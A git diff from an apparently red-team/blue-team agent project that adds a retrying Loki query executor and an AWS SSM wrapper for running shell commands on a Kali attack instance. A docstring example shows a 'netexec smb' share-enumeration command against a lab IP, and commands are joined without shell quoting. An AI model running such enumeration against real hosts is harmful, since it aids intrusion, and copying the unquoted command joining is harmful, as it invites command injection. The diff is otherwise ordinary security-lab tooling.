+        """Fraction of attempts that succeeded; 0.0 before any attempt was made."""
+        return self.successful_attempts / self.total_attempts if self.total_attempts != 0 else 0.0
+
+
+class QueryResilientExecutor:
+ """Executes queries with automatic retry and time range reduction.
+
+ Features:
+ - Automatic time range reduction on timeout
+ - Exponential backoff for retries
+ - Query chunking for large time ranges
+ - Statistics tracking for monitoring
+ """
+
+ # Fractions of the requested time range that execute_with_resilience tries in
+ # order: 1.0 is the full range, later entries shrink the window.
+ TIME_RANGE_FACTORS: ClassVar[list[float]] = [1.0, 0.5, 0.25, 0.1]
+ # Seconds slept before a retry, indexed by retry number; the last entry is
+ # reused once there are more retries than entries.
+ BACKOFF_DELAYS: ClassVar[list[int]] = [1, 2, 4]
+
+ def __init__(
+     self,
+     max_retries: int = 3,
+     initial_timeout: float = 30.0,
+     enable_chunking: bool = True,
+     chunk_size_minutes: int = 30,
+ ):
+     """Configure retry, timeout and chunking behaviour and start with empty stats.
+
+     Args:
+         max_retries: Maximum number of attempts made per time window
+         initial_timeout: Timeout of the first attempt in seconds
+         enable_chunking: Whether to enable query chunking for large ranges
+         chunk_size_minutes: Size of each chunk in minutes
+     """
+     # Statistics accumulate over the lifetime of this executor instance.
+     self.stats = QueryStats()
+
+     # Retry / timeout settings
+     self.max_retries, self.initial_timeout = max_retries, initial_timeout
+
+     # Chunking settings
+     self.enable_chunking, self.chunk_size_minutes = enable_chunking, chunk_size_minutes
+
+ async def execute_with_resilience(
+     self,
+     query_fn: Callable[..., Any],
+     query: str,
+     start_time: str,
+     end_time: str,
+     **kwargs: Any,
+ ) -> dict[str, Any]:
+     """Execute a query with automatic retry and time range reduction.
+
+     Ranges longer than the chunking threshold are delegated to
+     ``_execute_chunked`` (when chunking is enabled). Otherwise the query is
+     tried against each entry of ``TIME_RANGE_FACTORS``: the window shrinks but
+     always ends at ``end_time``. Each window gets up to ``max_retries``
+     attempts with backoff and a timeout that grows by 50% per retry.
+
+     Args:
+         query_fn: The async query function; it is called as
+             ``query_fn(logql=query, start_time=..., end_time=..., **kwargs)``
+         query: The query string (LogQL or PromQL)
+         start_time: ISO8601 start timestamp
+         end_time: ISO8601 end timestamp
+         **kwargs: Additional arguments for the query function
+
+     Returns:
+         The query result; dict results gain a ``_resilience_metadata`` entry.
+         A dict result reporting a non-timeout error is returned unchanged
+         (plus metadata) but is recorded as a failed attempt. When every
+         attempt fails, an error dict with a suggestion is returned; its
+         counters are the executor's lifetime totals.
+     """
+     start_dt = datetime.fromisoformat(start_time.replace("Z", "+00:00"))
+     end_dt = datetime.fromisoformat(end_time.replace("Z", "+00:00"))
+     original_range = end_dt - start_dt
+
+     # _execute_chunked calls back into this method for every chunk, so only
+     # chunk when each chunk is guaranteed to fall below the threshold again;
+     # otherwise a chunk size above 2h would recurse without end. A
+     # non-positive chunk size cannot make progress, so chunking is skipped.
+     chunk_delta = timedelta(minutes=self.chunk_size_minutes)
+     chunk_threshold = max(timedelta(hours=2), chunk_delta)
+     if (
+         self.enable_chunking
+         and chunk_delta > timedelta(0)
+         and original_range > chunk_threshold
+     ):
+         logger.info(f"Query range ({original_range}) exceeds 2h, using chunked execution")
+         return await self._execute_chunked(query_fn, query, start_dt, end_dt, **kwargs)
+
+     # Try with progressively smaller time ranges
+     last_error = None
+     for factor in self.TIME_RANGE_FACTORS:
+         if factor < 1.0:
+             self.stats.time_range_reductions += 1
+
+         # The reduced window is anchored at the end time, since recent data
+         # is usually more relevant.
+         reduced_range = original_range * factor
+         new_start = end_dt - reduced_range
+         new_start_str = new_start.isoformat().replace("+00:00", "Z")
+         new_end_str = end_dt.isoformat().replace("+00:00", "Z")
+
+         if factor < 1.0:
+             logger.info(
+                 f"Reducing time range to {factor * 100:.0f}% ({reduced_range}) for retry"
+             )
+
+         # Try with retries at this time range
+         for attempt in range(self.max_retries):
+             self.stats.total_attempts += 1
+
+             if attempt > 0:
+                 self.stats.retry_count += 1
+                 delay = self.BACKOFF_DELAYS[min(attempt - 1, len(self.BACKOFF_DELAYS) - 1)]
+                 logger.info(
+                     f"Retry attempt {attempt + 1}/{self.max_retries} after {delay}s backoff"
+                 )
+                 await asyncio.sleep(delay)
+
+             # Timing starts after the backoff so duration_ms reflects the query only.
+             attempt_start = datetime.now(timezone.utc)
+             timeout = self.initial_timeout * (1 + attempt * 0.5)  # Increase timeout on retries
+
+             try:
+                 result = await asyncio.wait_for(
+                     query_fn(
+                         logql=query,
+                         start_time=new_start_str,
+                         end_time=new_end_str,
+                         **kwargs,
+                     ),
+                     timeout=timeout,
+                 )
+
+                 if isinstance(result, dict) and result.get("status") == "error":
+                     error_msg = str(result.get("error") or "Unknown error")
+                     lowered = error_msg.lower()
+                     self._record_attempt(
+                         query,
+                         new_start_str,
+                         new_end_str,
+                         attempt + 1,
+                         attempt_start,
+                         success=False,
+                         error=error_msg,
+                     )
+                     if "timeout" in lowered or "deadline" in lowered:
+                         self.stats.timeout_count += 1
+                         last_error = error_msg
+                         logger.warning(f"Query timeout: {error_msg}")
+                         continue  # Try next retry
+                     # Other errors are handed back to the caller, but they are
+                     # not counted as successes and emit no success metric.
+                     logger.warning(f"Query error (non-timeout): {error_msg}")
+                 else:
+                     self.stats.successful_attempts += 1
+                     self._record_attempt(
+                         query,
+                         new_start_str,
+                         new_end_str,
+                         attempt + 1,
+                         attempt_start,
+                         success=True,
+                         result_count=self._count_results(result),
+                     )
+                     dn.log_metric("query_success", 1, mode="count")
+
+                 if isinstance(result, dict):
+                     result["_resilience_metadata"] = {
+                         "original_start": start_time,
+                         "original_end": end_time,
+                         "actual_start": new_start_str,
+                         "actual_end": new_end_str,
+                         "time_range_factor": factor,
+                         "retry_count": attempt,
+                         "time_range_reduced": factor < 1.0,
+                     }
+
+                 return result
+
+             except asyncio.TimeoutError:
+                 self.stats.timeout_count += 1
+                 last_error = f"Timeout after {timeout}s"
+                 logger.warning(f"Query timed out after {timeout}s (attempt {attempt + 1})")
+                 self._record_attempt(
+                     query,
+                     new_start_str,
+                     new_end_str,
+                     attempt + 1,
+                     attempt_start,
+                     success=False,
+                     error=last_error,
+                 )
+
+             except Exception as e:
+                 last_error = str(e)
+                 logger.error(f"Query failed: {e}")
+                 self._record_attempt(
+                     query,
+                     new_start_str,
+                     new_end_str,
+                     attempt + 1,
+                     attempt_start,
+                     success=False,
+                     error=last_error,
+                 )
+
+                 # Check for gRPC errors (non-retryable in most cases)
+                 if "grpc" in str(e).lower():
+                     break  # Move to next time range factor
+
+     # All attempts failed
+     dn.log_metric("query_all_retries_failed", 1, mode="count")
+     logger.error(f"All query attempts failed after {self.stats.total_attempts} attempts")
+
+     return {
+         "status": "error",
+         "error": f"Query failed after all retries. Last error: {last_error}",
+         "_resilience_metadata": {
+             "total_attempts": self.stats.total_attempts,
+             "timeout_count": self.stats.timeout_count,
+             "time_range_reductions": self.stats.time_range_reductions,
+             "final_time_range_factor": self.TIME_RANGE_FACTORS[-1],
+         },
+         "suggestion": (
+             "The query consistently times out. Try:\n"
+             "1. Use more specific label filters to reduce data volume\n"
+             "2. Query a shorter time range manually\n"
+             "3. Simplify the regex patterns in the query"
+         ),
+     }
+
+ def _record_attempt(
+     self,
+     query: str,
+     window_start: str,
+     window_end: str,
+     attempt_number: int,
+     started_at: datetime,
+     success: bool,
+     error: str | None = None,
+     result_count: int = 0,
+ ) -> None:
+     """Append a QueryAttempt for one finished attempt, timing it from ``started_at``."""
+     elapsed = datetime.now(timezone.utc) - started_at
+     self.stats.attempts.append(
+         QueryAttempt(
+             query=query[:100],
+             start_time=window_start,
+             end_time=window_end,
+             attempt_number=attempt_number,
+             success=success,
+             error=error,
+             result_count=result_count,
+             duration_ms=int(elapsed.total_seconds() * 1000),
+         )
+     )
+
+ async def _execute_chunked(
+     self,
+     query_fn: Callable[..., Any],
+     query: str,
+     start_dt: datetime,
+     end_dt: datetime,
+     **kwargs: Any,
+ ) -> dict[str, Any]:
+     """Execute a query in chunks and merge results.
+
+     The range is split into consecutive windows of ``chunk_size_minutes``
+     (the last one may be shorter); each window goes through
+     ``execute_with_resilience`` and the successful results are merged.
+
+     Args:
+         query_fn: The async query function
+         query: The query string
+         start_dt: Start datetime
+         end_dt: End datetime
+         **kwargs: Additional query arguments
+
+     Returns:
+         Merged results from all chunks, with a ``_chunked_execution`` summary.
+         When every chunk fails, an error dict is returned instead of an
+         empty "success".
+
+     Raises:
+         ValueError: If ``chunk_size_minutes`` is not positive.
+     """
+     if self.chunk_size_minutes <= 0:
+         # A non-positive step would never advance past start_dt.
+         raise ValueError(
+             f"chunk_size_minutes must be positive, got {self.chunk_size_minutes}"
+         )
+
+     # Each chunk is executed through execute_with_resilience, which chunks
+     # again anything longer than 2 hours; capping the chunk length at 2 hours
+     # keeps that from recursing forever.
+     chunk_minutes = min(self.chunk_size_minutes, 120)
+     chunk_delta = timedelta(minutes=chunk_minutes)
+
+     chunks = []
+     current_start = start_dt
+     while current_start < end_dt:
+         current_end = min(current_start + chunk_delta, end_dt)
+         chunks.append((current_start, current_end))
+         current_start = current_end
+
+     logger.info(f"Executing query in {len(chunks)} chunks of {chunk_minutes}min each")
+
+     all_results = []
+     failed_chunks = []
+     last_error = None
+
+     for i, (chunk_start, chunk_end) in enumerate(chunks):
+         logger.debug(f"Executing chunk {i + 1}/{len(chunks)}")
+
+         chunk_result = await self.execute_with_resilience(
+             query_fn,
+             query,
+             chunk_start.isoformat().replace("+00:00", "Z"),
+             chunk_end.isoformat().replace("+00:00", "Z"),
+             **kwargs,
+         )
+
+         if isinstance(chunk_result, dict) and chunk_result.get("status") == "error":
+             failed_chunks.append(i)
+             last_error = chunk_result.get("error")
+             logger.warning(f"Chunk {i + 1} failed: {last_error}")
+         else:
+             all_results.append(chunk_result)
+
+     chunk_summary = {
+         "total_chunks": len(chunks),
+         "successful_chunks": len(all_results),
+         "failed_chunks": len(failed_chunks),
+         "chunk_size_minutes": chunk_minutes,
+     }
+
+     if failed_chunks:
+         logger.warning(f"{len(failed_chunks)}/{len(chunks)} chunks failed")
+
+     if chunks and not all_results:
+         # Nothing succeeded: merging would produce an empty "success" that
+         # looks like "no matching data".
+         return {
+             "status": "error",
+             "error": f"All {len(chunks)} query chunks failed. Last error: {last_error}",
+             "_chunked_execution": chunk_summary,
+         }
+
+     merged = self._merge_chunk_results(all_results)
+     if isinstance(merged, dict):
+         merged["_chunked_execution"] = chunk_summary
+
+     return merged
+
+ def _merge_chunk_results(self, results: list[dict[str, Any]]) -> dict[str, Any]:
+     """Merge results from multiple chunks.
+
+     The ``data.result`` lists of all chunk results are concatenated in the
+     order given. Entries that are not dicts, or whose ``data`` / ``result``
+     do not have the expected dict / list shape, contribute nothing.
+
+     Args:
+         results: List of query results from chunks
+
+     Returns:
+         Merged result dict
+     """
+     # For Loki-style results, merge the streams
+     merged_streams = []
+     for result in results:
+         if not isinstance(result, dict):
+             continue
+         data = result.get("data")
+         if not isinstance(data, dict):
+             # "data" may be missing or explicitly null in a chunk response.
+             continue
+         streams = data.get("result")
+         if isinstance(streams, list):
+             merged_streams.extend(streams)
+
+     return {
+         "status": "success",
+         "data": {"result": merged_streams},
+     }
+
+ def _count_results(self, result: Any) -> int:
+     """Count the number of results in a query response.
+
+     A list counts its elements. A dict is read as ``data.result`` holding
+     streams, and the lengths of each stream's ``values`` list are summed.
+     Anything that does not have that shape counts as 0 rather than raising.
+     """
+     if isinstance(result, list):
+         return len(result)
+     if not isinstance(result, dict):
+         return 0
+
+     data = result.get("data")
+     if not isinstance(data, dict):
+         # "data" may be missing or explicitly null.
+         return 0
+     streams = data.get("result")
+     if not isinstance(streams, list):
+         return 0
+
+     total = 0
+     for stream in streams:
+         values = stream.get("values") if isinstance(stream, dict) else None
+         if isinstance(values, list):
+             total += len(values)
+     return total
+
+ def get_stats_summary(self) -> dict[str, Any]:
+     """Report the executor's counters as a plain dict.
+
+     Returns:
+         Dict with query execution statistics; ``success_rate`` is formatted
+         as a percentage string with one decimal
+     """
+     stats = self.stats
+     summary: dict[str, Any] = {}
+     summary["total_attempts"] = stats.total_attempts
+     summary["successful_attempts"] = stats.successful_attempts
+     summary["success_rate"] = f"{stats.success_rate * 100:.1f}%"
+     summary["timeout_count"] = stats.timeout_count
+     summary["retry_count"] = stats.retry_count
+     summary["time_range_reductions"] = stats.time_range_reductions
+     return summary
+
+
+# Singleton instance for global use: created lazily by get_resilient_executor()
+# and dropped again by reset_resilient_executor().
+_resilient_executor: QueryResilientExecutor | None = None
+
+
+def get_resilient_executor() -> QueryResilientExecutor:
+    """Return the shared executor, creating it with default settings on first use."""
+    global _resilient_executor
+    executor = _resilient_executor
+    if executor is None:
+        executor = _resilient_executor = QueryResilientExecutor()
+    return executor
+
+
+def reset_resilient_executor() -> None:
+ """Reset the global executor (for testing or new investigations).
+
+ Only the module-level reference is dropped; the next
+ get_resilient_executor() call builds a new executor with fresh statistics.
+ """
+ global _resilient_executor
+ _resilient_executor = None
diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py
new file mode 100644
index 00000000..51c278fd
--- /dev/null
+++ b/src/ares/core/remote.py
@@ -0,0 +1,407 @@
+"""Remote command execution via AWS SSM.
+
+This module provides functionality to execute commands on remote EC2 instances
+(specifically the Kali attack box) using AWS Systems Manager (SSM).
+"""
+
+import os
+import time
+from dataclasses import dataclass
+from typing import Any, NoReturn
+
+import boto3
+from botocore.exceptions import ClientError, SSOTokenLoadError, TokenRetrievalError
+from loguru import logger
+
+
+class SSOTokenExpiredError(Exception):
+ """Raised when AWS SSO token has expired and needs refresh.
+
+ SSMExecutor also raises it when the configured profile yields no
+ credentials at all. The message names the ``aws sso login`` command to run.
+ """
+
+
+@dataclass
+class CommandResult:
+    """Result of a remote command execution."""
+
+    # Text captured from the command's standard output / standard error.
+    stdout: str
+    stderr: str
+    # Exit status reported for the command.
+    return_code: int
+    success: bool
+
+    @property
+    def output(self) -> str:
+        """Combined stdout and stderr output.
+
+        The two streams are joined with a newline when both have content;
+        when only one has content it is returned on its own, so the result
+        never starts with a stray blank line.
+        """
+        if self.stdout and self.stderr:
+            return f"{self.stdout}\n{self.stderr}"
+        return self.stdout or self.stderr
+
+
+class SSMExecutor:
+ """Execute commands on remote EC2 instances via AWS SSM.
+
+ This class handles command execution on the Kali attack box using
+ AWS Systems Manager send-command API.
+
+ Attributes:
+ instance_id: EC2 instance ID of the target (Kali box)
+ profile: AWS profile name for authentication
+ region: AWS region
+ """
+
+ def __init__(
+     self,
+     instance_id: str | None = None,
+     instance_name: str | None = None,
+     profile: str = "lab",
+     region: str = "us-west-1",
+ ):
+     """Store the connection settings; no AWS call is made here.
+
+     When ``instance_name`` is empty, the ``ARES_KALI_INSTANCE`` environment
+     variable is used, falling back to a built-in default name. The boto3
+     clients are created lazily on first access.
+
+     Args:
+         instance_id: EC2 instance ID (if known)
+         instance_name: EC2 instance Name tag to resolve to instance ID
+         profile: AWS profile name
+         region: AWS region
+     """
+     if not instance_name:
+         instance_name = os.environ.get(
+             "ARES_KALI_INSTANCE", "staging-alpha-operator-range-kali"
+         )
+
+     # Lazily created boto3 clients
+     self._ssm_client: Any = None
+     self._ec2_client: Any = None
+
+     self._instance_id = instance_id
+     self._instance_name = instance_name
+     self.profile = profile
+     self.region = region
+
+ def _create_session(self) -> boto3.Session:
+     """Build a boto3 session for the configured profile and region.
+
+     Credentials are resolved and frozen immediately so that an expired SSO
+     login surfaces here rather than on the first API call.
+
+     Raises:
+         SSOTokenExpiredError: When no credentials are available, or when
+             credential resolution fails with an SSO/token-expiry error.
+     """
+     try:
+         session = boto3.Session(profile_name=self.profile, region_name=self.region)
+         # Force credential resolution to catch SSO errors early
+         credentials = session.get_credentials()
+         if credentials is None:
+             raise SSOTokenExpiredError(  # noqa: TRY301
+                 f"No credentials available for profile '{self.profile}'. "
+                 f"Run: aws sso login --profile {self.profile}"
+             )
+         # Try to actually use the credentials to validate them
+         credentials.get_frozen_credentials()
+     except (TokenRetrievalError, SSOTokenLoadError) as e:
+         self._handle_sso_error(e)
+     except Exception as e:
+         message = str(e).lower()
+         mentions_token = "token" in message
+         if mentions_token and ("expired" in message or "sso" in message):
+             self._handle_sso_error(e)
+         raise
+     else:
+         return session
+
+ def _handle_sso_error(self, original_error: Exception) -> NoReturn:
+     """Log a banner explaining the expired SSO session, then raise.
+
+     Cached clients are invalidated before raising so that the next use
+     authenticates again. This method never returns.
+
+     Raises:
+         SSOTokenExpiredError: Always, chained from ``original_error``.
+     """
+     banner_lines = [
+         f"\n{'=' * 60}\n",
+         f"AWS SSO TOKEN EXPIRED\n",
+         f"{'=' * 60}\n",
+         f"Your AWS SSO session has expired.\n\n",
+         f"To fix this, run:\n",
+         f" aws sso login --profile {self.profile}\n\n",
+         f"Original error: {original_error}\n",
+         f"{'=' * 60}\n",
+     ]
+     logger.error("".join(banner_lines))
+
+     # Clear cached clients so next attempt will re-authenticate
+     self._invalidate_clients()
+
+     summary = (
+         f"AWS SSO token expired for profile '{self.profile}'. "
+         f"Run: aws sso login --profile {self.profile}"
+     )
+     raise SSOTokenExpiredError(summary) from original_error
+
+ def _invalidate_clients(self) -> None:
+     """Clear cached clients to force re-authentication on next use.
+
+     The instance ID is deliberately kept: it does not depend on the
+     credentials, and clearing it would discard an ID passed explicitly to
+     the constructor, making later calls fall back to the Name-tag lookup and
+     possibly target a different instance.
+     """
+     self._ssm_client = None
+     self._ec2_client = None
+
+ @property
+ def ssm_client(self) -> Any:
+     """SSM client, created from a validated session on first access and then cached."""
+     client = self._ssm_client
+     if client is None:
+         client = self._create_session().client("ssm")
+         self._ssm_client = client
+     return client
+
+ @property
+ def ec2_client(self) -> Any:
+     """EC2 client, created from a validated session on first access and then cached."""
+     client = self._ec2_client
+     if client is None:
+         client = self._create_session().client("ec2")
+         self._ec2_client = client
+     return client
+
+ @property
+ def instance_id(self) -> str:
+     """Instance ID of the target, looked up by name on first access and then cached."""
+     cached = self._instance_id
+     if cached is not None:
+         return cached
+     self._instance_id = self._resolve_instance_id()
+     return self._instance_id
+
+ def _resolve_instance_id(self) -> str:
+     """Find the running EC2 instance whose Name tag equals the configured name.
+
+     The first instance ID found in the response is used.
+
+     Raises:
+         SSOTokenExpiredError: When the lookup fails because of an SSO or
+             token-expiry problem.
+         RuntimeError: When no running instance matches, or when the EC2
+             call fails with any other client error.
+     """
+
+     def is_sso_failure(error: Exception) -> bool:
+         """Tell whether the error text points at an expired/SSO token."""
+         error_str = str(error).lower()
+         return "token" in error_str and ("expired" in error_str or "sso" in error_str)
+
+     try:
+         response = self.ec2_client.describe_instances(
+             Filters=[
+                 {"Name": "tag:Name", "Values": [self._instance_name]},
+                 {"Name": "instance-state-name", "Values": ["running"]},
+             ]
+         )
+
+         candidate_ids = (
+             instance.get("InstanceId")
+             for reservation in response.get("Reservations", [])
+             for instance in reservation.get("Instances", [])
+         )
+         instance_id = next((found for found in candidate_ids if found), None)
+         if instance_id is None:
+             raise RuntimeError(f"No running instance found with name '{self._instance_name}'")  # noqa: TRY301
+
+         logger.info(f"Resolved Kali instance '{self._instance_name}' to {instance_id}")
+         return instance_id
+
+     except SSOTokenExpiredError:
+         raise
+     except (TokenRetrievalError, SSOTokenLoadError) as e:
+         self._handle_sso_error(e)
+     except ClientError as e:
+         if is_sso_failure(e):
+             self._handle_sso_error(e)
+         raise RuntimeError(f"Failed to resolve instance ID: {e}") from e
+     except Exception as e:
+         if is_sso_failure(e):
+             self._handle_sso_error(e)
+         raise
+
+ def run_command(
+     self,
+     command: str | list[str],
+     timeout_seconds: int = 300,
+     working_directory: str = "/tmp",  # noqa: S108 # nosec B108
+ ) -> CommandResult:
+     """Run a shell command on the remote instance through SSM and wait for it.
+
+     A list command is joined with single spaces, without shell quoting. The
+     script sent to the instance changes into ``working_directory``, runs the
+     command and exits with the command's exit code.
+
+     Args:
+         command: Command string or list of command parts
+         timeout_seconds: Maximum time to wait for command completion
+         working_directory: Directory to execute command in
+
+     Returns:
+         CommandResult with stdout, stderr, and return code. A non-SSO
+         ``ClientError`` is reported as a failed CommandResult with return
+         code 1 instead of being raised.
+
+     Raises:
+         SSOTokenExpiredError: When the call fails because of an SSO or
+             token-expiry problem.
+     """
+     if isinstance(command, list):
+         command_str = " ".join(command)
+     else:
+         command_str = command
+
+     def is_sso_failure(error: Exception) -> bool:
+         """Tell whether the error text points at an expired/SSO token."""
+         error_str = str(error).lower()
+         return "token" in error_str and ("expired" in error_str or "sso" in error_str)
+
+     # Wrap command to capture exit code and handle errors
+     wrapped_command = f"""
+cd {working_directory}
+{command_str}
+EXIT_CODE=$?
+exit $EXIT_CODE
+"""
+
+     try:
+         logger.debug(f"SSM executing: {command_str[:100]}...")
+
+         send_response = self.ssm_client.send_command(
+             InstanceIds=[self.instance_id],
+             DocumentName="AWS-RunShellScript",
+             Parameters={"commands": [wrapped_command]},
+             TimeoutSeconds=timeout_seconds,
+         )
+
+         command_id = send_response["Command"]["CommandId"]
+         logger.debug(f"SSM command ID: {command_id}")
+
+         # Wait for command to complete
+         return self._wait_for_command(command_id, timeout_seconds)
+
+     except SSOTokenExpiredError:
+         # Re-raise SSO errors without wrapping
+         raise
+     except (TokenRetrievalError, SSOTokenLoadError) as e:
+         self._handle_sso_error(e)
+     except ClientError as e:
+         if is_sso_failure(e):
+             self._handle_sso_error(e)
+         error_msg = f"SSM command failed: {e}"
+         logger.error(error_msg)
+         return CommandResult(
+             stdout="",
+             stderr=error_msg,
+             return_code=1,
+             success=False,
+         )
+     except Exception as e:
+         # Catch any other SSO-related errors
+         if is_sso_failure(e):
+             self._handle_sso_error(e)
+         raise
+
+    def _wait_for_command(
+        self,
+        command_id: str,
+        timeout_seconds: int,
+    ) -> CommandResult:
+        """Poll SSM until the command reaches a final status or the timeout passes.
+
+        Args:
+            command_id: ID returned by ``send_command``.
+            timeout_seconds: Maximum time to keep polling.
+
+        Returns:
+            CommandResult built from the invocation's output and response code,
+            or a failed result with return code 124 when polling times out.
+
+        Raises:
+            SSOTokenExpiredError: Re-raised unchanged when it occurs.
+            ClientError: Any client error other than ``InvocationDoesNotExist``
+                that is not handled as an SSO error.
+        """
+        # Use the monotonic clock so wall-clock adjustments (NTP, manual
+        # changes) cannot shorten or extend the timeout.
+        start_time = time.monotonic()
+        poll_interval = 2  # seconds
+
+        while True:
+            elapsed = time.monotonic() - start_time
+            if elapsed > timeout_seconds:
+                return CommandResult(
+                    stdout="",
+                    stderr=f"Command timed out after {timeout_seconds} seconds",
+                    return_code=124,
+                    success=False,
+                )
+
+            try:
+                response = self.ssm_client.get_command_invocation(
+                    CommandId=command_id,
+                    InstanceId=self.instance_id,
+                )
+
+                status = response.get("Status", "")
+
+                if status in ("Success", "Failed", "Cancelled", "TimedOut"):
+                    stdout = response.get("StandardOutputContent", "")
+                    stderr = response.get("StandardErrorContent", "")
+                    return_code = response.get("ResponseCode", -1)
+
+                    # Handle None return code
+                    if return_code is None:
+                        return_code = 0 if status == "Success" else 1
+
+                    # Both the SSM status and the exit code must indicate success.
+                    success = status == "Success" and return_code == 0
+
+                    logger.debug(
+                        f"SSM command completed: status={status}, return_code={return_code}"
+                    )
+
+                    return CommandResult(
+                        stdout=stdout,
+                        stderr=stderr,
+                        return_code=return_code,
+                        success=success,
+                    )
+
+                # Still pending, wait and retry
+                time.sleep(poll_interval)
+
+            except SSOTokenExpiredError:
+                raise
+            except (TokenRetrievalError, SSOTokenLoadError) as e:
+                # NOTE(review): _handle_sso_error presumably raises; confirm,
+                # otherwise the loop continues without sleeping.
+                self._handle_sso_error(e)
+            except ClientError as e:
+                error_str = str(e).lower()
+                if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+                    self._handle_sso_error(e)
+                if "InvocationDoesNotExist" in str(e):
+                    # Command not yet visible, wait and retry
+                    time.sleep(poll_interval)
+                    continue
+                raise
+            except Exception as e:
+                error_str = str(e).lower()
+                if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+                    self._handle_sso_error(e)
+                raise
+
+
+# Module-wide SSMExecutor singleton; stays None until first requested.
+_executor: SSMExecutor | None = None
+
+
+def get_executor() -> SSMExecutor:
+    """Return the shared SSM executor, constructing it on the first call."""
+    global _executor
+    if _executor is not None:
+        return _executor
+    _executor = SSMExecutor()
+    return _executor
+
+
+def validate_sso_credentials(profile: str = "lab") -> bool:
+    """Validate that SSO credentials are available and not expired.
+
+    Call this at the start of an operation to fail fast if credentials
+    are invalid, rather than failing mid-operation.
+
+    Args:
+        profile: AWS profile name to validate
+
+    Returns:
+        True if credentials are valid
+
+    Raises:
+        SSOTokenExpiredError: If no credentials are available for the profile,
+            or the SSO token is expired or invalid
+    """
+    try:
+        session = boto3.Session(profile_name=profile)
+        credentials = session.get_credentials()
+        if credentials is None:
+            raise SSOTokenExpiredError(  # noqa: TRY301
+                f"No credentials available for profile '{profile}'. "
+                f"Run: aws sso login --profile {profile}"
+            )
+        # Force credential resolution to validate token
+        credentials.get_frozen_credentials()
+        logger.debug(f"SSO credentials validated for profile '{profile}'")
+        return True
+    except SSOTokenExpiredError:
+        # Already the error callers expect. Pass it through untouched so the
+        # text heuristic below cannot re-word "no credentials" as "token
+        # expired" when the profile name itself contains "token".
+        raise
+    except (TokenRetrievalError, SSOTokenLoadError) as e:
+        raise SSOTokenExpiredError(
+            f"AWS SSO token expired for profile '{profile}'. Run: aws sso login --profile {profile}"
+        ) from e
+    except Exception as e:
+        # Other exception types are treated as SSO expiry only when their
+        # message mentions a token together with "expired" or "sso".
+        error_str = str(e).lower()
+        if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+            raise SSOTokenExpiredError(
+                f"AWS SSO token expired for profile '{profile}'. "
+                f"Run: aws sso login --profile {profile}"
+            ) from e
+        raise
+
+
+def reset_executor() -> None:
+    """Discard the cached global executor.
+
+    Meant to be called once the SSO token has been refreshed: the next
+    ``get_executor()`` call then constructs a new ``SSMExecutor``.
+    """
+    global _executor
+    # Clearing the reference is enough; creation happens lazily on next use.
+    _executor = None
+    logger.info("SSM executor reset - will re-authenticate on next use")
+
+
+def run_remote(
+    command: str | list[str],
+    timeout_seconds: int = 300,
+    working_directory: str = "/tmp",  # noqa: S108 # nosec B108
+) -> CommandResult:
+    """Run a command on the remote Kali instance through the shared executor.
+
+    Thin wrapper around ``get_executor().run_command(...)``.
+
+    Args:
+        command: Command string or list of command parts
+        timeout_seconds: Maximum time to wait
+        working_directory: Directory to execute in
+
+    Returns:
+        CommandResult with stdout, stderr, and return code
+
+    Example:
+        >>> result = run_remote("netexec smb 10.1.2.219 --shares")
+        >>> print(result.stdout)
+    """
+    return get_executor().run_command(command, timeout_seconds, working_directory)
diff --git a/src/ares/integrations/mitre.py b/src/ares/integrations/mitre.py
index 46c7ea70..e3fef207 100644
--- a/src/ares/integrations/mitre.py
+++ b/src/ares/integrations/mitre.py
@@ -103,7 +103,6 @@ async def load(self) -> None:
response.raise_for_status()
bundle = response.json()
- # Parse STIX objects
for obj in bundle.get("objects", []):
obj_type = obj.get("type")
@@ -131,12 +130,10 @@ def _parse_technique(self, obj: dict) -> None:
if not technique_id:
return
- # Get tactic from kill chain
kill_chain = obj.get("kill_chain_phases", [])
tactic_shortname = kill_chain[0]["phase_name"] if kill_chain else "unknown"
tactic_id = self.TACTIC_MAP.get(tactic_shortname, "")
- # Check if subtechnique
is_subtechnique = obj.get("x_mitre_is_subtechnique", False)
parent = None
if is_subtechnique and "." in technique_id:
diff --git a/src/ares/main.py b/src/ares/main.py
index b5071740..eb452fa5 100644
--- a/src/ares/main.py
+++ b/src/ares/main.py
@@ -87,7 +87,6 @@ async def main(
args = args or Args()
dn_args = dn_args or DreadnodeArgs()
- # Get API keys from environment if not provided
grafana_api_key = args.grafana_api_key or os.getenv("GRAFANA_API_KEY", "")
dreadnode_token = dn_args.token or os.getenv("DREADNODE_API_KEY", "")
@@ -116,7 +115,6 @@ async def main(
from ares.integrations.mitre import MITREAttackClient
from ares.tools.blue import GrafanaTools
- # Initialize MITRE client
logger.info("Loading MITRE ATT&CK data from STIX repository...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -129,7 +127,6 @@ async def main(
report_dir.mkdir(parents=True, exist_ok=True)
logger.info(f"Reports: {report_dir}")
- # Initialize orchestrator
orchestrator = InvestigationOrchestrator(
model=args.model,
grafana_url=args.grafana_url,
@@ -139,7 +136,6 @@ async def main(
max_steps=args.max_steps,
)
- # Initialize Grafana client for polling
grafana = GrafanaTools(
base_url=args.grafana_url,
api_key=grafana_api_key,
@@ -158,7 +154,6 @@ async def main(
try:
while True:
try:
- # Poll for firing alerts
alerts = await grafana.get_firing_alerts()
for alert in alerts:
@@ -195,7 +190,6 @@ async def main(
except Exception as e:
logger.error(f"Investigation failed: {e}")
- dn.log_metric("investigation_failed", 1, mode="count")
# If running in once mode, exit after processing current alerts
if args.once:
@@ -245,7 +239,6 @@ async def investigate_alert(
args = args or Args()
dn_args = dn_args or DreadnodeArgs()
- # Parse alert
if alert_json.startswith("{"):
alert = json.loads(alert_json)
else:
@@ -267,7 +260,6 @@ async def investigate_alert(
from ares.agents.blue import InvestigationOrchestrator
from ares.integrations.mitre import MITREAttackClient
- # Load MITRE data
logger.info("Loading MITRE ATT&CK data...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -351,7 +343,6 @@ async def redteam(
from ares.agents.red import RedTeamOrchestrator
from ares.integrations.mitre import MITREAttackClient
- # Load MITRE data
logger.info("Loading MITRE ATT&CK data...")
mitre_client = MITREAttackClient()
await mitre_client.load()
@@ -364,7 +355,6 @@ async def redteam(
report_dir.mkdir(parents=True, exist_ok=True)
logger.info(f"Reports: {report_dir}")
- # Create orchestrator
orchestrator = RedTeamOrchestrator(
model=args.model,
mitre_client=mitre_client,
